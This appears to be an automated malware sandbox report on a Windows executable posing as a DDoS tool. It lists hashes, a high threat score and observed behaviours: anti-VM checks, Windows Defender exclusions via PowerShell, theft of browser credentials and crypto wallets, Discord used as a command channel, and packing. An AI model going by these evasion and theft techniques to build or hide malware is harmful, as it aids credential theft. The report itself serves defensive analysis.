6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31

Analysis

max time kernel
94s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
05-01-2025 03:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DDOSERFORWINDOWS11_protected.exe
Size

8.7MB
MD5

41b147fd16a94a8ea6164177cf91733c
SHA1

f586388782d636b286ef606de997087f451fe11f
SHA256

6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31
SHA512

c15b8cc463186471a12431131d90733f9389d2eded969ee056b1bfe391ab255fc88c4f1b896e05dc6d4f94cba82bf066316fca489047781e13ddfd522e9e5da0
SSDEEP

196608:lPWgT2X83i4bCFRu3TN9hoy6Enwc4GgpG0REtHIrq7L3mrbW3jmy+:lDKXe0c3jWyotGgpGLtz7bmrbmyJ

Score

9^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer themida trojan upx

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DDOSERFORWINDOWS11_protected.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	DDOSERFORWINDOWS11_protected.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4804	powershell.exe
400	powershell.exe
4892	powershell.exe
2256	powershell.exe
3008	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DDOSERFORWINDOWS11_protected.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x000a000000023b81-27.dat	acprotect
behavioral2/files/0x000a000000023b74-33.dat	acprotect
behavioral2/files/0x000a000000023b7f-35.dat	acprotect
behavioral2/files/0x000a000000023b7b-54.dat	acprotect
behavioral2/files/0x000a000000023b7a-53.dat	acprotect
behavioral2/files/0x000a000000023b79-52.dat	acprotect
behavioral2/files/0x000a000000023b78-51.dat	acprotect
behavioral2/files/0x000a000000023b77-50.dat	acprotect
behavioral2/files/0x000a000000023b76-49.dat	acprotect
behavioral2/files/0x000a000000023b75-48.dat	acprotect
behavioral2/files/0x000a000000023b73-47.dat	acprotect
behavioral2/files/0x000b000000023b86-46.dat	acprotect
behavioral2/files/0x000b000000023b85-45.dat	acprotect
behavioral2/files/0x000a000000023b84-44.dat	acprotect
behavioral2/files/0x000a000000023b80-41.dat	acprotect
behavioral2/files/0x000a000000023b7e-40.dat	acprotect

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DDOSERFORWINDOWS11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DDOSERFORWINDOWS11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	DDOSERFORWINDOWS11_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	DDOSERFORWINDOWS11_protected.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3968	powershell.exe
1172	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
1488	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/32-0-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-2-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-3-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4876-26-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4876-25-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-63-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4876-74-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-226-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-373-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/4876-401-0x0000000000400000-0x0000000000B47000-memory.dmp	themida
behavioral2/memory/32-430-0x0000000000400000-0x0000000000B47000-memory.dmp	themida

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DDOSERFORWINDOWS11_protected.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	DDOSERFORWINDOWS11_protected.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2616	tasklist.exe
3360	tasklist.exe
1544	tasklist.exe
720	tasklist.exe
4004	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3088	cmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
32	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b81-27.dat	upx
behavioral2/memory/4876-31-0x0000000074DB0000-0x00000000752BB000-memory.dmp	upx
behavioral2/files/0x000a000000023b74-33.dat	upx
behavioral2/memory/4876-36-0x0000000074D60000-0x0000000074D7F000-memory.dmp	upx
behavioral2/files/0x000a000000023b7f-35.dat	upx
behavioral2/memory/4876-38-0x0000000074D50000-0x0000000074D5D000-memory.dmp	upx
behavioral2/files/0x000a000000023b7b-54.dat	upx
behavioral2/files/0x000a000000023b7a-53.dat	upx
behavioral2/files/0x000a000000023b79-52.dat	upx
behavioral2/files/0x000a000000023b78-51.dat	upx
behavioral2/files/0x000a000000023b77-50.dat	upx
behavioral2/files/0x000a000000023b76-49.dat	upx
behavioral2/files/0x000a000000023b75-48.dat	upx
behavioral2/files/0x000a000000023b73-47.dat	upx
behavioral2/files/0x000b000000023b86-46.dat	upx
behavioral2/files/0x000b000000023b85-45.dat	upx
behavioral2/files/0x000a000000023b84-44.dat	upx
behavioral2/files/0x000a000000023b80-41.dat	upx
behavioral2/files/0x000a000000023b7e-40.dat	upx
behavioral2/memory/4876-60-0x0000000074D20000-0x0000000074D47000-memory.dmp	upx
behavioral2/memory/4876-65-0x0000000074CE0000-0x0000000074CFB000-memory.dmp	upx
behavioral2/memory/4876-64-0x0000000074D00000-0x0000000074D18000-memory.dmp	upx
behavioral2/memory/4876-67-0x0000000074BA0000-0x0000000074CD7000-memory.dmp	upx
behavioral2/memory/4876-80-0x0000000074B30000-0x0000000074B3C000-memory.dmp	upx
behavioral2/memory/4876-78-0x0000000074800000-0x0000000074A5A000-memory.dmp	upx
behavioral2/memory/4876-77-0x0000000074A60000-0x0000000074AF4000-memory.dmp	upx
behavioral2/memory/4876-76-0x0000000074B00000-0x0000000074B28000-memory.dmp	upx
behavioral2/memory/4876-86-0x0000000074790000-0x00000000747A0000-memory.dmp	upx
behavioral2/memory/4876-85-0x0000000074650000-0x0000000074769000-memory.dmp	upx
behavioral2/memory/4876-84-0x0000000074780000-0x000000007478C000-memory.dmp	upx
behavioral2/memory/4876-75-0x0000000074B80000-0x0000000074B96000-memory.dmp	upx
behavioral2/memory/4876-92-0x0000000074DB0000-0x00000000752BB000-memory.dmp	upx
behavioral2/memory/4876-114-0x0000000074D60000-0x0000000074D7F000-memory.dmp	upx
behavioral2/memory/4876-228-0x0000000074BA0000-0x0000000074CD7000-memory.dmp	upx
behavioral2/memory/4876-227-0x0000000074CE0000-0x0000000074CFB000-memory.dmp	upx
behavioral2/memory/4876-244-0x0000000074DB0000-0x00000000752BB000-memory.dmp	upx
behavioral2/memory/4876-258-0x0000000074650000-0x0000000074769000-memory.dmp	upx
behavioral2/memory/4876-255-0x0000000074800000-0x0000000074A5A000-memory.dmp	upx
behavioral2/memory/4876-254-0x0000000074A60000-0x0000000074AF4000-memory.dmp	upx
behavioral2/memory/4876-253-0x0000000074B00000-0x0000000074B28000-memory.dmp	upx
behavioral2/memory/4876-251-0x0000000074B80000-0x0000000074B96000-memory.dmp	upx
behavioral2/memory/4876-245-0x0000000074D60000-0x0000000074D7F000-memory.dmp	upx
behavioral2/memory/4876-391-0x0000000074BA0000-0x0000000074CD7000-memory.dmp	upx
behavioral2/memory/4876-385-0x0000000074DB0000-0x00000000752BB000-memory.dmp	upx
behavioral2/memory/4876-386-0x0000000074D60000-0x0000000074D7F000-memory.dmp	upx
behavioral2/memory/4876-428-0x0000000074800000-0x0000000074A5A000-memory.dmp	upx
behavioral2/memory/4876-427-0x0000000074A60000-0x0000000074AF4000-memory.dmp	upx
behavioral2/memory/4876-426-0x0000000074B00000-0x0000000074B28000-memory.dmp	upx
behavioral2/memory/4876-425-0x0000000074B80000-0x0000000074B96000-memory.dmp	upx
behavioral2/memory/4876-424-0x0000000074790000-0x00000000747A0000-memory.dmp	upx
behavioral2/memory/4876-423-0x0000000074D00000-0x0000000074D18000-memory.dmp	upx
behavioral2/memory/4876-422-0x0000000074D20000-0x0000000074D47000-memory.dmp	upx
behavioral2/memory/4876-421-0x0000000074D50000-0x0000000074D5D000-memory.dmp	upx
behavioral2/memory/4876-420-0x0000000074D60000-0x0000000074D7F000-memory.dmp	upx
behavioral2/memory/4876-419-0x0000000074DB0000-0x00000000752BB000-memory.dmp	upx
behavioral2/memory/4876-418-0x0000000074B30000-0x0000000074B3C000-memory.dmp	upx
behavioral2/memory/4876-417-0x0000000074CE0000-0x0000000074CFB000-memory.dmp	upx
behavioral2/memory/4876-416-0x0000000074650000-0x0000000074769000-memory.dmp	upx
behavioral2/memory/4876-415-0x0000000074780000-0x000000007478C000-memory.dmp	upx
behavioral2/memory/4876-408-0x0000000074BA0000-0x0000000074CD7000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	getmac.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DDOSERFORWINDOWS11_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DDOSERFORWINDOWS11_protected.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2856	cmd.exe
788	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3916	netsh.exe
4752	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2584	WMIC.exe
896	WMIC.exe
1372	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
452	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
788	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
32	DDOSERFORWINDOWS11_protected.exe
32	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
4876	DDOSERFORWINDOWS11_protected.exe
2256	powershell.exe
4804	powershell.exe
2256	powershell.exe
4804	powershell.exe
400	powershell.exe
400	powershell.exe
400	powershell.exe
3968	powershell.exe
3968	powershell.exe
2584	powershell.exe
2584	powershell.exe
3968	powershell.exe
2584	powershell.exe
3008	powershell.exe
3008	powershell.exe
3704	powershell.exe
3704	powershell.exe
4892	powershell.exe
4892	powershell.exe
3588	powershell.exe
3588	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4004	tasklist.exe
Token: SeIncreaseQuotaPrivilege	428	WMIC.exe
Token: SeSecurityPrivilege	428	WMIC.exe
Token: SeTakeOwnershipPrivilege	428	WMIC.exe
Token: SeLoadDriverPrivilege	428	WMIC.exe
Token: SeSystemProfilePrivilege	428	WMIC.exe
Token: SeSystemtimePrivilege	428	WMIC.exe
Token: SeProfSingleProcessPrivilege	428	WMIC.exe
Token: SeIncBasePriorityPrivilege	428	WMIC.exe
Token: SeCreatePagefilePrivilege	428	WMIC.exe
Token: SeBackupPrivilege	428	WMIC.exe
Token: SeRestorePrivilege	428	WMIC.exe
Token: SeShutdownPrivilege	428	WMIC.exe
Token: SeDebugPrivilege	428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	428	WMIC.exe
Token: SeRemoteShutdownPrivilege	428	WMIC.exe
Token: SeUndockPrivilege	428	WMIC.exe
Token: SeManageVolumePrivilege	428	WMIC.exe
Token: 33	428	WMIC.exe
Token: 34	428	WMIC.exe
Token: 35	428	WMIC.exe
Token: 36	428	WMIC.exe
Token: SeIncreaseQuotaPrivilege	428	WMIC.exe
Token: SeSecurityPrivilege	428	WMIC.exe
Token: SeTakeOwnershipPrivilege	428	WMIC.exe
Token: SeLoadDriverPrivilege	428	WMIC.exe
Token: SeSystemProfilePrivilege	428	WMIC.exe
Token: SeSystemtimePrivilege	428	WMIC.exe
Token: SeProfSingleProcessPrivilege	428	WMIC.exe
Token: SeIncBasePriorityPrivilege	428	WMIC.exe
Token: SeCreatePagefilePrivilege	428	WMIC.exe
Token: SeBackupPrivilege	428	WMIC.exe
Token: SeRestorePrivilege	428	WMIC.exe
Token: SeShutdownPrivilege	428	WMIC.exe
Token: SeDebugPrivilege	428	WMIC.exe
Token: SeSystemEnvironmentPrivilege	428	WMIC.exe
Token: SeRemoteShutdownPrivilege	428	WMIC.exe
Token: SeUndockPrivilege	428	WMIC.exe
Token: SeManageVolumePrivilege	428	WMIC.exe
Token: 33	428	WMIC.exe
Token: 34	428	WMIC.exe
Token: 35	428	WMIC.exe
Token: 36	428	WMIC.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeIncreaseQuotaPrivilege	2584	WMIC.exe
Token: SeSecurityPrivilege	2584	WMIC.exe
Token: SeTakeOwnershipPrivilege	2584	WMIC.exe
Token: SeLoadDriverPrivilege	2584	WMIC.exe
Token: SeSystemProfilePrivilege	2584	WMIC.exe
Token: SeSystemtimePrivilege	2584	WMIC.exe
Token: SeProfSingleProcessPrivilege	2584	WMIC.exe
Token: SeIncBasePriorityPrivilege	2584	WMIC.exe
Token: SeCreatePagefilePrivilege	2584	WMIC.exe
Token: SeBackupPrivilege	2584	WMIC.exe
Token: SeRestorePrivilege	2584	WMIC.exe
Token: SeShutdownPrivilege	2584	WMIC.exe
Token: SeDebugPrivilege	2584	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2584	WMIC.exe
Token: SeRemoteShutdownPrivilege	2584	WMIC.exe
Token: SeUndockPrivilege	2584	WMIC.exe
Token: SeManageVolumePrivilege	2584	WMIC.exe
Token: 33	2584	WMIC.exe
Token: 34	2584	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 32 wrote to memory of 4876	32	DDOSERFORWINDOWS11_protected.exe	83
PID 32 wrote to memory of 4876	32	DDOSERFORWINDOWS11_protected.exe	83
PID 32 wrote to memory of 4876	32	DDOSERFORWINDOWS11_protected.exe	83
PID 4876 wrote to memory of 1604	4876	DDOSERFORWINDOWS11_protected.exe	84
PID 4876 wrote to memory of 1604	4876	DDOSERFORWINDOWS11_protected.exe	84
PID 4876 wrote to memory of 1604	4876	DDOSERFORWINDOWS11_protected.exe	84
PID 4876 wrote to memory of 3648	4876	DDOSERFORWINDOWS11_protected.exe	85
PID 4876 wrote to memory of 3648	4876	DDOSERFORWINDOWS11_protected.exe	85
PID 4876 wrote to memory of 3648	4876	DDOSERFORWINDOWS11_protected.exe	85
PID 4876 wrote to memory of 2924	4876	DDOSERFORWINDOWS11_protected.exe	86
PID 4876 wrote to memory of 2924	4876	DDOSERFORWINDOWS11_protected.exe	86
PID 4876 wrote to memory of 2924	4876	DDOSERFORWINDOWS11_protected.exe	86
PID 4876 wrote to memory of 1748	4876	DDOSERFORWINDOWS11_protected.exe	90
PID 4876 wrote to memory of 1748	4876	DDOSERFORWINDOWS11_protected.exe	90
PID 4876 wrote to memory of 1748	4876	DDOSERFORWINDOWS11_protected.exe	90
PID 4876 wrote to memory of 3256	4876	DDOSERFORWINDOWS11_protected.exe	92
PID 4876 wrote to memory of 3256	4876	DDOSERFORWINDOWS11_protected.exe	92
PID 4876 wrote to memory of 3256	4876	DDOSERFORWINDOWS11_protected.exe	92
PID 1604 wrote to memory of 4804	1604	cmd.exe	94
PID 1604 wrote to memory of 4804	1604	cmd.exe	94
PID 1604 wrote to memory of 4804	1604	cmd.exe	94
PID 1748 wrote to memory of 4004	1748	cmd.exe	95
PID 1748 wrote to memory of 4004	1748	cmd.exe	95
PID 1748 wrote to memory of 4004	1748	cmd.exe	95
PID 3256 wrote to memory of 428	3256	cmd.exe	139
PID 3256 wrote to memory of 428	3256	cmd.exe	139
PID 3256 wrote to memory of 428	3256	cmd.exe	139
PID 2924 wrote to memory of 3900	2924	cmd.exe	97
PID 2924 wrote to memory of 3900	2924	cmd.exe	97
PID 2924 wrote to memory of 3900	2924	cmd.exe	97
PID 3648 wrote to memory of 2256	3648	cmd.exe	98
PID 3648 wrote to memory of 2256	3648	cmd.exe	98
PID 3648 wrote to memory of 2256	3648	cmd.exe	98
PID 4876 wrote to memory of 3600	4876	DDOSERFORWINDOWS11_protected.exe	100
PID 4876 wrote to memory of 3600	4876	DDOSERFORWINDOWS11_protected.exe	100
PID 4876 wrote to memory of 3600	4876	DDOSERFORWINDOWS11_protected.exe	100
PID 3600 wrote to memory of 3496	3600	cmd.exe	102
PID 3600 wrote to memory of 3496	3600	cmd.exe	102
PID 3600 wrote to memory of 3496	3600	cmd.exe	102
PID 4876 wrote to memory of 3008	4876	DDOSERFORWINDOWS11_protected.exe	180
PID 4876 wrote to memory of 3008	4876	DDOSERFORWINDOWS11_protected.exe	180
PID 4876 wrote to memory of 3008	4876	DDOSERFORWINDOWS11_protected.exe	180
PID 3008 wrote to memory of 2672	3008	cmd.exe	184
PID 3008 wrote to memory of 2672	3008	cmd.exe	184
PID 3008 wrote to memory of 2672	3008	cmd.exe	184
PID 4876 wrote to memory of 2944	4876	DDOSERFORWINDOWS11_protected.exe	106
PID 4876 wrote to memory of 2944	4876	DDOSERFORWINDOWS11_protected.exe	106
PID 4876 wrote to memory of 2944	4876	DDOSERFORWINDOWS11_protected.exe	106
PID 2944 wrote to memory of 2584	2944	cmd.exe	147
PID 2944 wrote to memory of 2584	2944	cmd.exe	147
PID 2944 wrote to memory of 2584	2944	cmd.exe	147
PID 4876 wrote to memory of 4336	4876	DDOSERFORWINDOWS11_protected.exe	109
PID 4876 wrote to memory of 4336	4876	DDOSERFORWINDOWS11_protected.exe	109
PID 4876 wrote to memory of 4336	4876	DDOSERFORWINDOWS11_protected.exe	109
PID 4336 wrote to memory of 896	4336	cmd.exe	111
PID 4336 wrote to memory of 896	4336	cmd.exe	111
PID 4336 wrote to memory of 896	4336	cmd.exe	111
PID 4876 wrote to memory of 3088	4876	DDOSERFORWINDOWS11_protected.exe	112
PID 4876 wrote to memory of 3088	4876	DDOSERFORWINDOWS11_protected.exe	112
PID 4876 wrote to memory of 3088	4876	DDOSERFORWINDOWS11_protected.exe	112
PID 4876 wrote to memory of 4140	4876	DDOSERFORWINDOWS11_protected.exe	113
PID 4876 wrote to memory of 4140	4876	DDOSERFORWINDOWS11_protected.exe	113
PID 4876 wrote to memory of 4140	4876	DDOSERFORWINDOWS11_protected.exe	113
PID 4140 wrote to memory of 400	4140	cmd.exe	116

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
388	attrib.exe
3716	attrib.exe
4504	attrib.exe

C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe
"C:\Users\Admin\AppData\Local\Temp\DDOSERFORWINDOWS11_protected.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
